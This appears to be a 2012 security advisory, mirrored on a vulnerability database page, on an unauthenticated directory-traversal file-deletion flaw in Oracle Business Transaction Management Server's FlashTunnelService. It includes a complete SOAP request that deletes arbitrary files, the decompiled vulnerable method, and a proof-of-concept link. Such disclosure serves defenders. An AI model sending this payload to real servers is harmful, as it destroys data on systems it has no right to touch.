Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28359
HistoryAug 13, 2012 - 12:00 a.m.

Oracle Business Transaction Management Server FlashTunnelService Remote File Deletion

2012-08-1300:00:00
vulners.com
24
JSON

Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService
Remote File Deletion

tested against: Microsoft Windows Server 2003 r2 sp2
Oracle WebLogic Server 12c (12.1.1)
Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

files tested:
oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic)
download url: http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html

BTM_Servers_12.1.0.2.7.zip (BTM, production version)
download url: http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html

vulnerability:
the mentioned product installs a web service
called "FlashTunnelService" which can be reached
without prior authentication and processes incoming
SOAP requests.

It can be reached at the following uri:
http://[host]:7001/btmui/soa/flash_svc/

This soap interface exposes the 'deleteFile' function
which could allow to delete arbitrary files with administrative
privileges on the target
server through a directory traversal vulnerability.
This could be useful for further attacks.

Example packet:

POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://soa.amberpoint.com/deleteFile"
User-Agent: Jakarta Commons-HttpClient/3.1
Host: [host]:7001
Content-Length: [length]

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces&quot; xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types&quot;&gt;
<soapenv:Header/>
<soapenv:Body>
<int:deleteFileRequest>
<int:deleteFile handle="…/…/…/…/…/…/…/…/…/…/…/…/somepath/somefile.ext">
<typ:DeleteFileRequestVersion>
</typ:DeleteFileRequestVersion>
</int:deleteFile>
</int:deleteFileRequest>
</soapenv:Body>
</soapenv:Envelope>

Vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl class:

public IDeleteFileResponse deleteFile(IDeleteFileRequest request)
throws SOAPFaultException
{
DeleteFileResponse dfr = new DeleteFileResponse();
String handle = request.getHandle();
File f = getFileFromHandle(handle);
if(f != null)
f.delete();
return dfr;
}

As attachment, proof of concept code.

poc: http://retrogod.altervista.org/9sg_ora2.htm

rgod

JSON